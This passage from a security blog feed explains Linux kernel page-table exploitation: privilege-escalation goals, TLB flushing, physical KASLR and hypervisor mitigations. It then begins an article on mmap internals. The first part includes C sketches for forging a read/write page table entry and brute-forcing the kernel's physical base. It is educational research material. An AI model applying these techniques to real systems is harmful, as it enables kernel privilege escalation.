0xffff888101346010:     0x800000010743c025      0x0000000000000000</code></pre><p>And just like that we&apos;ve walked our <code>mm</code>&apos;s PGD all the way down to a specific PT, containing our 3 mappings: R/W anonymous mapping, RO anonymous mapping and finally a RO file. Sweet!</p><p>I&apos;ll leave examining the various attributes, using the PTE diagram from the previous section, as an exercise for any interested readers, as I fear I&apos;ve sidetracked enough. The main goal of this little adventure is to demonstrate how you can get some hands-on debugging and poke around to help build your understanding, as it can be vital when working on complex exploitation techniques like this!</p><p>Now, where were we - weighing up our options for exploitation if we have some level of control over a page table... </p><h4 id="approaches">Approaches</h4><p>So, depending on our primitive, here are a couple of options we might consider:</p><ul><li>Overwriting the address bits (and maybe the Page Size bit for PUD/PMD entries) to gain arbitrary physical address R/W (note, we&apos;ll discuss phys KASLR later).</li><li>Overwriting permissions bits to gain R/W on a privileged file that is mapped into our process&apos;s virtual address space as read-only.</li></ul><p>Using our kernel AAW we could: disable SELinux, using one of the techniques outlined <a href="https://klecko.github.io/posts/selinux-bypasses">here</a>, such as overwriting the <code>selinux_state</code> singleton<a href="https://klecko.github.io/posts/selinux-bypasses/#bypass-1-disable-selinux"><sup>[3]</sup></a><a href="https://soez.github.io/posts/CVE-2022-22265-Samsung-npu-driver/#disable-selinux"><sup>[4]</sup></a>; patch the kernel to gain root (e.g. 
<code>setresuid()</code>, <code>setresgid()</code>)<a href="https://web.archive.org/web/20250304082609/https://yanglingxi1993.github.io/dirty_pagetable/dirty_pagetable.html#step3-patch-the-kernel"><sup>[5]</sup></a><sup><a href="https://ptr-yudai.hatenablog.com/entry/2023/12/08/093606#Escaping-from-nsjail">[6]</a></sup>; overwrite <code>modprobe_path</code> because that&apos;s sometimes still a thing<sup><a href="https://sam4k.com/like-techniques-modprobe_path/">[7]</a></sup>; follow the linked lists of tasks from <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/sched/task.h#L58">init_task</a></code> to elevate the privilege of your own <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/cred.h#L111">cred</a></code>s or forge <code>init</code>&apos;s etc. The world is our oyster (if our primitive is flexible enough...)!</p><p>As for files we might want to target, we could: patch shared libraries used by privileged processes to gain a reverse shell<sup><a href="https://soez.github.io/posts/CVE-2022-22265-Samsung-npu-driver/#inject-code-into-libbaseso">[8]</a><a href="https://github.com/polygraphene/DirtyPipe-Android/blob/master/TECHNICAL-DETAILS.md#exploit-process">[9]</a><a href="https://starlabs.sg/blog/2025/12-mali-cious-intent-exploiting-gpu-vulnerabilities-cve-2022-22706/#exploitation-primitive">[10]</a></sup>; patch SUID binaries to gain a privileged shell etc.</p><h4 id="on-caching">On Caching</h4><p>Before we get giddy with power, beyond the limitations of our primitive, there are a few other things to consider: mitigations (which I&apos;ll cover in the next section) and caching.</p><p>So far we&apos;ve covered paging at a reasonably high level: the process of translating a virtual address to the correct physical address involves walking the appropriate page tables using the bits found in the virtual address. 
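</p><p>To make that bit-slicing concrete, here&apos;s a small C sketch of the arithmetic we used in the walk above. The helper names are my own (not kernel API), and it assumes 4-level x86_64 paging with 4KiB pages and the default physmap base we used earlier:</p>

```c
#include <stdint.h>

/* Illustrative helpers (not kernel API) for 4-level x86_64 paging. */
#define IDX_MASK    0x1ffUL               /* 9 index bits per level */
#define PGD_SHIFT   39                    /* bits 39-47 */
#define PUD_SHIFT   30                    /* bits 30-38 */
#define PMD_SHIFT   21                    /* bits 21-29 */
#define PT_SHIFT    12                    /* bits 12-20 */
#define PHYS_MASK   0x0000fffffffff000UL  /* strip metadata bits 0:11 and 48:63 */
#define PAGE_OFFSET 0xffff888000000000UL  /* default x86_64 physmap base */

static inline uint64_t pgd_index(uint64_t va) { return (va >> PGD_SHIFT) & IDX_MASK; }
static inline uint64_t pud_index(uint64_t va) { return (va >> PUD_SHIFT) & IDX_MASK; }
static inline uint64_t pmd_index(uint64_t va) { return (va >> PMD_SHIFT) & IDX_MASK; }
static inline uint64_t pt_index(uint64_t va)  { return (va >> PT_SHIFT)  & IDX_MASK; }

/* physical address a page table entry points to */
static inline uint64_t entry_to_phys(uint64_t entry) { return entry & PHYS_MASK; }

/* where that physical address can be read via the physmap */
static inline uint64_t phys_to_physmap(uint64_t pa) { return PAGE_OFFSET + pa; }
```

<p>For our fixed address <code>0x8040200000</code> these helpers return indices <code>1, 1, 1, 0</code>, matching the walk, and <code>entry_to_phys(0x8000000102c9b067)</code> gives back the <code>0x102c9b000</code> we dumped.</p><p>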
</p><p>This address translation is offloaded to the hardware and is the job of the Memory Management Unit (MMU). As you might imagine, this can get computationally expensive when you scale things up, and also inefficient if we&apos;re constantly accessing the same pages of memory. </p><p>To address this, the hardware makes use of various caches, storing address translations (the primary cache for this being the Translation Lookaside Buffer (TLB)) and pages.</p><p>If we start messing with page table entries or pages, in order for the hardware to actually see these changes, we need to flush the appropriate caches so they&apos;re updated with <em>our </em>version. </p><p>Of the write-ups I&apos;ve mentioned so far, the <a href="https://web.archive.org/web/20250304082609/https://yanglingxi1993.github.io/dirty_pagetable/dirty_pagetable.html">Dirty Pagetable article</a> has a <a href="https://web.archive.org/web/20250304082609/https://yanglingxi1993.github.io/dirty_pagetable/dirty_pagetable.html#61-how-to-flush-tlb-and-page-table-caches">section</a> on this for aarch64 and the <a href="https://pwning.tech/nftables/">Flipping Pages article</a> has a <a href="https://pwning.tech/nftables/#47-tlb-flushing">section</a> relevant to x86_64. 
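</p><p>Putting the last two sections together: if our primitive lets us overwrite a PT entry, the value we&apos;d forge for an arbitrary physical R/W might look like the sketch below. The <code>0x67</code> flag byte (Present | Writable | User | Accessed | Dirty on x86_64) matches the entries we dumped earlier, but verify it against your target - and remember the relevant TLB entries need flushing before the CPU will honour the new entry:</p>

```c
#include <stdint.h>

/* Sketch: forge a PTE mapping a chosen physical address as user R/W.
 * 0x67 = Present | Writable | User | Accessed | Dirty (x86_64) - the
 * same flag byte seen in the dumps above; check your target's layout
 * before relying on it. */
#define PTE_PHYS_MASK 0x0000fffffffff000UL
#define PTE_FLAGS_URW 0x67UL

static inline uint64_t forge_pte(uint64_t target_phys)
{
    return (target_phys & PTE_PHYS_MASK) | PTE_FLAGS_URW;
}
```

<p>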
</p><hr><ol><li><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/gfp.h#L16">https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/gfp.h#L16</a></li><li><a href="https://lwn.net/Articles/619514/">https://lwn.net/Articles/619514/</a></li><li><a href="https://klecko.github.io/posts/selinux-bypasses/#bypass-1-disable-selinux">https://klecko.github.io/posts/selinux-bypasses/#bypass-1-disable-selinux</a></li><li><a href="https://soez.github.io/posts/CVE-2022-22265-Samsung-npu-driver/#disable-selinux">https://soez.github.io/posts/CVE-2022-22265-Samsung-npu-driver/#disable-selinux</a> (aarch64)</li><li><a href="https://web.archive.org/web/20250304082609/https://yanglingxi1993.github.io/dirty_pagetable/dirty_pagetable.html#step3-patch-the-kernel">https://web.archive.org/web/20250304082609/https://yanglingxi1993.github.io/dirty_pagetable/dirty_pagetable.html#step3-patch-the-kernel</a> (aarch64)</li><li><a href="https://ptr-yudai.hatenablog.com/entry/2023/12/08/093606#Escaping-from-nsjail">https://ptr-yudai.hatenablog.com/entry/2023/12/08/093606#Escaping-from-nsjail</a> (x86_64)</li><li><a href="https://sam4k.com/like-techniques-modprobe_path/">https://sam4k.com/like-techniques-modprobe_path/</a></li><li><a href="https://soez.github.io/posts/CVE-2022-22265-Samsung-npu-driver/#inject-code-into-libbaseso">https://soez.github.io/posts/CVE-2022-22265-Samsung-npu-driver/#inject-code-into-libbaseso</a> (aarch64)</li><li><a href="https://github.com/polygraphene/DirtyPipe-Android/blob/master/TECHNICAL-DETAILS.md#exploit-process">https://github.com/polygraphene/DirtyPipe-Android/blob/master/TECHNICAL-DETAILS.md#exploit-process</a> (aarch64)</li><li><a href="https://starlabs.sg/blog/2025/12-mali-cious-intent-exploiting-gpu-vulnerabilities-cve-2022-22706/#exploitation-primitive">https://starlabs.sg/blog/2025/12-mali-cious-intent-exploiting-gpu-vulnerabilities-cve-2022-22706/#exploitation-primitive</a> (aarch64)</li></ol><h2 
id="mitigations">Mitigations</h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2025/05/fun_time_is_over.gif" class="kg-image" alt="Kernel Exploitation Techniques: Turning The (Page) Tables" loading="lazy" width="480" height="270"></figure><p>Alright, we&apos;ve had our fun, now it&apos;s time to face reality: mitigations. Of course, one of the perks of page table exploitation is that it sidesteps many common mitigations: virtual KASLR, CFI, random kmalloc caches and other heap mitigations (it doesn&apos;t even need <code>modprobe_path</code>); not to mention the permissions set up by page tables to protect memory accesses via virtual addresses. However, that&apos;s not to say there&apos;s <em>nothing</em> to worry about. </p><h4 id="physical-kaslr">Physical KASLR</h4><p>As I mentioned earlier, usually when we&apos;re talking about Kernel Address Space Layout Randomisation (KASLR), we&apos;re referring to kernel virtual address randomisation. However, as we&apos;re dealing with physical addresses, we&apos;re interested in physical KASLR.</p><p><code><a href="https://cateee.net/lkddb/web-lkddb/RANDOMIZE_BASE.html">CONFIG_RANDOMIZE_BASE</a></code> is the kernel config option that enables randomising the address of the kernel image (KASLR). Below is the description for the x86_64 option:</p><!--kg-card-begin: markdown--><blockquote>
<p>In support of Kernel Address Space Layout Randomization (KASLR), this randomizes the physical address at which the kernel image is decompressed and the virtual address where the kernel image is mapped, as a security feature that deters exploit attempts relying on knowledge of the location of kernel code internals.</p>
<p><strong>On 64-bit, the kernel physical and virtual addresses are randomized separately.</strong></p>
</blockquote>
<!--kg-card-end: markdown--><p>Now, let&apos;s look at the aarch64 description:</p><blockquote>Randomizes <strong>the virtual address</strong> at which the kernel image is loaded, as a security feature that deters exploit attempts relying on knowledge of the location of kernel internals.</blockquote><p>As far as I understand it, there is no upstream support for physical KASLR on aarch64. That said, if you&apos;re on Android, you&apos;re not out of the woods yet - Samsung have their own physical KASLR implementation, so don&apos;t stop reading just yet. </p><p>For x86_64, the kernel&apos;s physical base address defaults to <code><a href="https://cateee.net/lkddb/web-lkddb/PHYSICAL_START.html">CONFIG_PHYSICAL_START</a></code> (typically <code>0x1000000</code>). However, the physical address alignment can be explicitly defined by <code><a href="https://cateee.net/lkddb/web-lkddb/PHYSICAL_ALIGN.html">CONFIG_PHYSICAL_ALIGN</a></code>, which is typically set to <code>0x200000</code> (the minimum value on x86_64). </p><p>Sooo how we approach this is going to depend on our primitive and whether we have control of a PT, PUD, PMD etc. But failing any context-specific leaks, the most straightforward approach is simply brute forcing the available physical memory: taking advantage of the alignment restrictions, we can read each possible base address and check for known signatures, either by updating PT entries or by mapping huge pages of physical memory.</p><h4 id="read-only-memory">Read-Only Memory</h4><p>Another mitigation that can thwart our page-level shenanigans is the use of read-only memory. But Sam, I hear you ask, we&apos;re dealing directly with physical addresses here, who&apos;s going to stop us?! 
As we&apos;ve mentioned, typically these protections are done during virtual address translation, but we&apos;re bypassing that, so what gives?</p><p>An example of this is Samsung&apos;s Real-time Kernel Protection (RKP), a hypervisor implementation which is part of <a href="https://www.samsungknox.com/en">Samsung KNOX</a>. I don&apos;t want to get too off track here, but essentially the hypervisor runs at a higher privilege level than even the kernel.</p><p>Moreover, it uses a two-stage address translation to control how the kernel (and thus we) see physical memory. This essentially allows the hypervisor to mark memory as read-only, so that even with our physical address read/write, we can still be caught by the hypervisor, as it&apos;s operating at a higher privilege. This is a gross simplification, so if you&apos;re interested in reading more, check out the awesome <a href="https://www.longterm.io/samsung_rkp.html">Samsung RKP Compendium</a>.</p><p>This can in turn be used to protect critical data structures such as SLAB caches (e.g. <code>cred_jar</code>), global variables, kernel page tables etc.</p><p>Note this isn&apos;t currently used (afaik) to protect user page tables, but it does narrow down the options available when exploiting the physical address read/write. 
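</p><p>To sketch the brute-force approach from the Physical KASLR section in code: given some physical read primitive (abstracted here as a <code>read64</code> callback - an illustrative signature, not a real API), we can step through candidate bases at <code>CONFIG_PHYSICAL_ALIGN</code> granularity looking for a known signature, such as the first bytes of the kernel image:</p>

```c
#include <stdint.h>

/* Brute-force sketch: scan aligned candidate physical base addresses
 * for a known 8-byte signature. read64 stands in for whatever physical
 * read primitive the exploit provides (forged PTEs, huge mappings etc.). */
static uint64_t find_phys_base(uint64_t (*read64)(uint64_t pa),
                               uint64_t start, uint64_t end,
                               uint64_t align, uint64_t sig)
{
    for (uint64_t pa = start; pa < end; pa += align)
        if (read64(pa) == sig)
            return pa;
    return 0; /* not found */
}

/* Toy stand-in primitive for demonstration only: pretends the image
 * landed at physical 0x3400000. */
static uint64_t demo_read64(uint64_t pa)
{
    return pa == 0x3400000UL ? 0x1122334455667788UL : 0;
}
```

<p>At the <code>0x200000</code> alignment that&apos;s only 512 candidates per GiB of physical memory, which is why the write-ups linked earlier treat this as cheap.</p><p>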
</p><h2 id="resources">Resources</h2><p>Below is a list of all the resources I&apos;ve linked throughout the article and any extras that are relevant to the topic of page table exploitation (if you think I&apos;ve missed any, <a href="https://x.com/sam4k1">lmk</a>!):</p><ol><li><a href="https://web.archive.org/web/20250304082609/https://yanglingxi1993.github.io/dirty_pagetable/dirty_pagetable.html">Dirty Pagetable: A Novel Exploitation Technique To Rule Linux Kernel</a> by <a href="https://x.com/NVamous">@NVamous</a> (2023) (aarch64) technique overview with 3 examples</li><li><a href="https://ptr-yudai.hatenablog.com/entry/2023/12/08/093606">&quot;Understanding Dirty Pagetable - m0leCon Finals 2023 CTF Writeup&quot;</a> by <a href="https://x.com/ptryudai">@ptrYudai</a> (2023) (x86_64) exploit write-up</li><li><a href="https://pwning.tech/nftables/">&quot;Flipping Pages: An analysis of a new Linux vulnerability in nf_tables and hardened exploitation techniques&quot;</a> by <a href="https://x.com/notselwyn/">@notselwyn</a> (2024) (x86_64) exploit write-up that expands on the Dirty Pagetable technique, covers phys KASLR bypass, cache flushing</li><li>PageJack (<a href="https://phrack.org/issues/71/13#article">Phrack article</a>, <a href="https://i.blackhat.com/BH-US-24/Presentations/US24-Qian-PageJack-A-Powerful-Exploit-Technique-With-Page-Level-UAF-Thursday.pdf">BlackHat slides</a>) (2024) technique overview</li><li><a href="https://powerofcommunity.net/poc2024/Pan%20Zhenpeng%20&amp;%20Jheng%20Bing%20Jhong,%20GPUAF%20-%20Two%20ways%20of%20rooting%20All%20Qualcomm%20based%20Android%20phones.pdf">GPUAF - Two ways of Rooting All Qualcomm based Android phones</a> (2024) (aarch64) exploit slides</li><li><a href="https://i.blackhat.com/BH-US-24/Presentations/REVISED02-US24-Gong-The-Way-to-Android-Root-Wednesday.pdf">The Way to Android Root: Exploiting Your GPU On Smartphone</a> (2024) (aarch64) exploit slides</li><li><a 
href="https://soez.github.io/posts/CVE-2022-22265-Samsung-npu-driver/">CVE-2022-22265 Samsung npu driver</a> (2024) (aarch64) exploit write-up that includes bypasses for Samsung DEFEX</li><li><a href="https://starlabs.sg/blog/2025/12-mali-cious-intent-exploiting-gpu-vulnerabilities-cve-2022-22706/#exploitation-primitive">Mali-cious Intent: Exploiting GPU Vulnerabilities (CVE-2022-22706 / CVE-2021-39793)</a> (2025) (aarch64) Mali GPU exploitation; demonstrates injecting hooks and payloads into read-only shared libraries</li></ol><p>RE internals and more background reading:</p><ol><li><a href="https://docs.kernel.org/mm/page_tables.html">Page Tables - Linux Kernel Docs</a> are a good place to start on fundamentals</li><li>Check out my <a href="https://sam4k.com/linternals/">Linternals series</a> for rundowns on page allocators and mm basics</li><li><a href="https://syst3mfailure.io/linux-page-allocator/">A Quick Dive Into The Linux Kernel Page Allocator</a> (2025) is a great look into the kernel&apos;s page allocator </li></ol><h2 id="wrapping-up">Wrapping Up</h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2025/05/job_done.gif" class="kg-image" alt="Kernel Exploitation Techniques: Turning The (Page) Tables" loading="lazy" width="480" height="226"></figure><p>Boom, we did it! This has been a fun one to write, and hopefully it&apos;s been, if not a fun, then at least a helpful read for anyone curious about the current trend of page table exploitation.</p><p>It&apos;s part of the broader cat-and-mouse game of security research: as mitigations catch up and become more widespread, attackers need to get more creative in bypassing or circumventing them completely. Often, this means going deeper and deeper into the internals. 
As we&apos;ve seen, by exploiting page tables and using physical memory addressing, we&apos;re essentially able to operate &quot;under&quot; the purview of traditional mitigations, such as the permission checks done at the virtual address level.</p><p>That said, it&apos;s not quite the wild west, as, while not widespread, mitigations for these techniques do exist. So I wonder where the next stop will be in this mitigations race!</p><p>If you&apos;re interested in digging deeper into page table internals, specifically with regards to kernel code and implementation, I&apos;ll be touching on that in the next part of <a href="https://sam4k.com/linternals/#memory-management">my <code>mm</code> series</a>.</p><p>As always feel free to @me (on <a href="https://twitter.com/sam4k1">X</a>, <a href="https://bsky.app/profile/sam4k.com">Bluesky</a> or less commonly used <a href="https://infosec.exchange/@sam4k">Mastodon</a>) if you have any questions, suggestions or corrections :)</p>]]></content:encoded></item><item><title><![CDATA[Linternals: Exploring The mm Subsystem via mmap [0x02]]]></title><description><![CDATA[In this part we'll use our case study to explore how the Linux kernel maps private anonymous memory.]]></description><link>https://sam4k.com/linternals-exploring-the-mm-subsystem-part-2/</link><guid isPermaLink="false">675f0187de619fc1154efe9b</guid><category><![CDATA[linternals]]></category><category><![CDATA[memory]]></category><category><![CDATA[linux]]></category><dc:creator><![CDATA[sam4k]]></dc:creator><pubDate>Fri, 25 Apr 2025 15:17:34 GMT</pubDate><media:content url="https://sam4k.com/content/images/2025/04/linternals.gif" medium="image"/><content:encoded><![CDATA[<img src="https://sam4k.com/content/images/2025/04/linternals.gif" alt="Linternals: Exploring The mm Subsystem via mmap [0x02]"><p>Welcome back! 
<a href="https://sam4k.com/linternals-exploring-the-mm-subsystem-part-1/">Last time</a> I left us on a bit of a cliffhanger, rolling the credits just as we were getting into the thick of it, so I&apos;ll keep the intro brief. </p><p>The aim of this series is to explore the inner workings of the Linux kernel&apos;s memory management (mm) subsystem by examining how this simple program is implemented:</p><pre><code class="language-C">#include &lt;sys/mman.h&gt;

int main()
{
    void *addr;

    addr = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
    *(long*)addr = 0x4142434445464748;

    munmap(addr, 0x1000);
    return 0;
}</code></pre><p>While I&apos;m making up the scope of this series as I go (seems fine), the general idea is to cover the mapping, writing and unmapping of memory in detail as the kernel sees it.</p><p>In the <a href="https://sam4k.com/linternals-exploring-the-mm-subsystem-part-1/">first part</a> of the series we covered: </p><ul><li>What memory management is and a brief overview of the kernel&apos;s mm subsystem</li><li>What our simple program does from the user&apos;s perspective and how it interacts with the kernel (it&apos;s only like 2 syscalls, how much could there be to cover...)</li><li>The start of our journey: how memory is mapped via the <code>mmap()</code> system call - argument marshalling, fetching the <code>mm_struct</code>, a bit of security, locking - right up until the actual implementation in <code>do_mmap()</code> anyway (sorry, that really was a cliffhanger)</li></ul><p>So without further ado, let&apos;s dive back into how (anonymous) memory is mapped via <code>mmap()</code>!</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2025/04/lets_do_this.gif" class="kg-image" alt="Linternals: Exploring The mm Subsystem via mmap [0x02]" loading="lazy" width="500" height="282"></figure><h2 id="contents">Contents</h2><!--kg-card-begin: markdown--><ul>
<li><a href="#mapping-memory-cont">Mapping Memory (cont.)</a>
<ul>
<li><a href="#what-are-mappings">What Are Mappings?</a>
<ul>
<li><a href="#struct-vmareastruct"><code>struct vm_area_struct</code></a></li>
<li><a href="#mm-mmmt"><code>mm-&gt;mm_mt</code></a></li>
</ul>
</li>
<li><a href="#dommap"><code>do_mmap()</code></a>
<ul>
<li><a href="#finding-a-suitable-addr">Finding A Suitable <code>addr</code></a></li>
</ul>
</li>
<li><a href="#mmapregion"><code>mmap_region()</code></a>
<ul>
<li><a href="#vma-merging">VMA Merging</a></li>
<li><a href="#vma-allocation">VMA Allocation</a></li>
</ul>
</li>
<li><a href="#final-bits">Final Bits</a></li>
<li><a href="#summary">Summary</a></li>
</ul>
</li>
<li><a href="#next-time">Next Time</a></li>
</ul>
<!--kg-card-end: markdown--><h2 id="mapping-memory-cont">Mapping Memory (cont.)</h2><p>Broadly speaking, there are 3 things happening in our program: mapping some anonymous memory, writing to it and then unmapping it. Currently, we&apos;re digging into the first part:</p><pre><code class="language-C">addr = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);</code></pre><p>Let&apos;s quickly recap how deep in the mm subsystem we are, since making our <code>mmap(2)</code> system call from our userspace program. Using gdb we can set a breakpoint on <code>do_mmap()</code>, which is where we left off, and check the backtrace:</p><figure class="kg-card kg-code-card"><pre><code>(gdb) bt
#0  do_mmap (file=file@entry=0x0 &lt;fixed_percpu_data&gt;, addr=0, len=4096, prot=3, flags=34, vm_flags=vm_flags@entry=0, pgoff=0, 
    populate=0xffffc90001a17e80, uf=0xffffc90001a17ea0) at mm/mmap.c:1215
#1  0xffffffff8162aabc in vm_mmap_pgoff (file=file@entry=0x0 &lt;fixed_percpu_data&gt;, addr=&lt;optimized out&gt;, len=&lt;optimized out&gt;, 
    prot=&lt;optimized out&gt;, flag=&lt;optimized out&gt;, pgoff=&lt;optimized out&gt;) at mm/util.c:556
#2  0xffffffff816a4d7c in ksys_mmap_pgoff (addr=0, len=4096, prot=3, flags=34, fd=&lt;optimized out&gt;, pgoff=0) at mm/mmap.c:1427
#3  0xffffffff810a894f in __do_sys_mmap (addr=0, off=&lt;optimized out&gt;, len=&lt;optimized out&gt;, prot=&lt;optimized out&gt;, flags=&lt;optimized out&gt;, 
    fd=&lt;optimized out&gt;) at arch/x86/kernel/sys_x86_64.c:93
#4  0xffffffff8100507f in x64_sys_call (regs=regs@entry=0xffffc90001a17f58, nr=nr@entry=9) at arch/x86/entry/syscall_64.c:29
#5  0xffffffff844328b1 in do_syscall_x64 (regs=0xffffc90001a17f58, nr=&lt;optimized out&gt;) at arch/x86/entry/common.c:51
#6  do_syscall_64 (regs=0xffffc90001a17f58, nr=&lt;optimized out&gt;) at arch/x86/entry/common.c:81
#7  0xffffffff84600130 in entry_SYSCALL_64 () at arch/x86/entry/entry_64.S:121</code></pre><figcaption>backtrace for our program&apos;s mmap() call (on a 6.11.5 kernel)</figcaption></figure><p>So far these functions have mostly been sanitising arguments, doing necessary security checks and taking the all-important <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mmap_lock.h#L117">mmap_write_lock_killable(mm)</a></code>. </p><p>Before we continue where we left off, about to dive into <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm.h#L3410">do_mmap()</a></code>, I&apos;m going to touch on some key background which will provide important context for the rest of the post!</p><h3 id="what-are-mappings">What Are Mappings?</h3><p>We probably shouldn&apos;t go much further down the memory mapping rabbit hole without first covering what a mapping is, or at least how the kernel represents them.</p><p>When we call <code><a href="https://man7.org/linux/man-pages/man2/mmap.2.html">mmap()</a></code> in our userspace program, we&apos;re looking to &quot;map&quot; some memory into our virtual address space. This could be a file or some anonymous memory (aka physical memory allocated for us to use), which can then be accessed via a virtual address in our process&apos;s virtual address space. </p><p>So a mapping in this context is essentially a virtual address range which is mapped to some physical memory. We can explore a process&apos;s mappings via <code>procfs</code>. Let&apos;s see if we can find our program&apos;s <code>0x1000</code>-byte mapping:</p><pre><code>$ cat /proc/91280/maps
00400000-00401000 r--p 00000000 00:2b 12253872                           mm_example
00401000-0047c000 r-xp 00001000 00:2b 12253872                           mm_example
0047c000-004a4000 r--p 0007c000 00:2b 12253872                           mm_example
004a4000-004a9000 r--p 000a3000 00:2b 12253872                           mm_example
004a9000-004ab000 rw-p 000a8000 00:2b 12253872                           mm_example
004ab000-004b1000 rw-p 00000000 00:00 0 
15b3e000-15b60000 rw-p 00000000 00:00 0                                  [heap]
7f556e60a000-7f556e60b000 rw-p 00000000 00:00 0 
7f556e60b000-7f556e60d000 r--p 00000000 00:00 0                          [vvar]
7f556e60d000-7f556e60f000 r--p 00000000 00:00 0                          [vvar_vclock]
7f556e60f000-7f556e611000 r-xp 00000000 00:00 0                          [vdso]
7ffd933f4000-7ffd93415000 rw-p 00000000 00:00 0                          [stack]
ffffffffff600000-ffffffffff601000 --xp 00000000 00:00 0                  [vsyscall]
</code></pre><p>We can see even our simple program has quite a few mappings, but let&apos;s not get distracted! There, at <code>7f556e60a000</code>, we can see our anonymous mapping! It spans <code>0x1000</code> bytes and has the <code>rw</code> permissions we expect, neat!</p><p>So now that we have a general idea of what a mapping is, how exactly does the kernel represent and manage our process&apos;s mappings? Cue <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L664">struct vm_area_struct</a></code>!</p><h4 id="struct-vmareastruct"><code>struct vm_area_struct</code></h4><pre><code>/*
 * This struct describes a virtual memory area. There is one of these
 * per VM-area/task. A VM area is any part of the process virtual memory
 * space that has a special rule for the page-fault handlers (ie a shared
 * library, the executable area etc).
 */
struct vm_area_struct {
	union {
		struct {
			/* VMA covers [vm_start; vm_end) addresses within mm */
			unsigned long vm_start;
			unsigned long vm_end;
		};
#ifdef CONFIG_PER_VMA_LOCK
		struct rcu_head vm_rcu;	/* Used for deferred freeing. */
#endif
	};

	struct mm_struct *vm_mm;	/* The address space we belong to. */
	pgprot_t vm_page_prot;          /* Access permissions of this VMA. */

	union {
		const vm_flags_t vm_flags;
		vm_flags_t __private __vm_flags;
	};

#ifdef CONFIG_PER_VMA_LOCK
	/* Flag to indicate areas detached from the mm-&gt;mm_mt tree */
	bool detached;

	int vm_lock_seq;
	struct vma_lock *vm_lock;
#endif

	/*
	 * For areas with an address space and backing store,
	 * linkage into the address_space-&gt;i_mmap interval tree.
	 *
	 */
	struct {
		struct rb_node rb;
		unsigned long rb_subtree_last;
	} shared;

	/*
	 * A file&apos;s MAP_PRIVATE vma can be in both i_mmap tree and anon_vma
	 * list, after a COW of one of the file pages.	A MAP_SHARED vma
	 * can only be in the i_mmap tree.  An anonymous MAP_PRIVATE, stack
	 * or brk vma (with NULL file) can only be in an anon_vma list.
	 */
	struct list_head anon_vma_chain; /* Serialized by mmap_lock &amp;
					  * page_table_lock */
	struct anon_vma *anon_vma;	/* Serialized by page_table_lock */

	/* Function pointers to deal with this struct. */
	const struct vm_operations_struct *vm_ops;

	/* Information about our backing store: */
	unsigned long vm_pgoff;		/* Offset (within vm_file) in PAGE_SIZE
					   units */
	struct file * vm_file;		/* File we map to (can be NULL). */
	void * vm_private_data;		/* was vm_pte (shared mem) */

#ifdef CONFIG_ANON_VMA_NAME
	/*
	 * For private and shared anonymous mappings, a pointer to a null
	 * terminated string containing the name given to the vma, or NULL if
	 * unnamed. Serialized by mmap_lock. Use anon_vma_name to access.
	 */
	struct anon_vma_name *anon_name;
#endif
#ifdef CONFIG_SWAP
	atomic_long_t swap_readahead_info;
#endif
#ifndef CONFIG_MMU
	struct vm_region *vm_region;	/* NOMMU mapping region */
#endif
#ifdef CONFIG_NUMA
	struct mempolicy *vm_policy;	/* NUMA policy for the VMA */
#endif
#ifdef CONFIG_NUMA_BALANCING
	struct vma_numab_state *numab_state;	/* NUMA Balancing state */
#endif
	struct vm_userfaultfd_ctx vm_userfaultfd_ctx;
} __randomize_layout;</code></pre><p>Perhaps understandably, there&apos;s a lot going on here! But this is the structure, referred to as a <code>vma</code>, that describes the virtual memory areas of a process. For example, you can see at the top <code>vm_start</code> and <code>vm_end</code> define the start and end addresses of the vma; just below that, <code>vm_mm</code> holds a reference to the <code>mm</code> the vma belongs to, etc. </p><p>We&apos;ll touch more on each field as it becomes relevant, but I just wanted to introduce the structure here rather than trying to wedge it in when it crops up down the line. </p><h4 id="mm-mmmt"><code>mm-&gt;mm_mt</code></h4><p>Okay, so a vma describes a single memory area, but as we saw, even our little program has quite a few memory areas - how are these all managed? Good question!</p><p>Each process is responsible for tracking its memory areas, and as we know, each process&apos;s memory is managed by a <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L779">mm_struct</a></code>! So this is where we&apos;ll find our answer:</p><figure class="kg-card kg-code-card"><pre><code>struct mm_struct {
		// SNIP
		struct maple_tree mm_mt;</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L779">include/linux/mm_types.h</a></figcaption></figure><p>Previously, this would have been <code>struct rb_root mm_rb;</code>, but since 6.1 the kernel moved from red-black trees to the <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/maple_tree.h#L219">maple_tree</a></code> data structure for vma management.</p><p>I&apos;m but a humble researcher, so if you&apos;re interested in diving more into maple tree internals, this <a href="https://lwn.net/Articles/845507/">LWN article</a> does a great job introducing maple trees (alternatively, head straight to the <a href="https://docs.kernel.org/core-api/maple_tree.html">kernel docs</a>). Suffice it to say it&apos;s a cache-optimised, low memory footprint data structure ideal for storing non-overlapping ranges - perfect for vmas!</p><p>The key details to highlight are that:</p><ul><li><code>mm_mt</code> is the tree of vmas belonging to the <code>mm_struct</code>&apos;s process,</li><li>A VMA is represented as a node within the tree, but the tree is also able to track gaps between these VMAs (i.e. gaps in the virtual address space)</li><li>The maple tree data structure comes with its own normal and advanced API, but there are also a set of wrapper functions specifically for handling vma maple tree usage</li></ul><h3 id="dommap"><code>do_mmap()</code></h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2025/04/so_where_we_were.gif" class="kg-image" alt="Linternals: Exploring The mm Subsystem via mmap [0x02]" loading="lazy" width="480" height="360"></figure><figure class="kg-card kg-code-card"><pre><code class="language-C">/*
 * The caller must write-lock current-&gt;mm-&gt;mmap_lock.
 */
unsigned long do_mmap(struct file *file, unsigned long addr,
			unsigned long len, unsigned long prot,
			unsigned long flags, vm_flags_t vm_flags,
			unsigned long pgoff, unsigned long *populate,
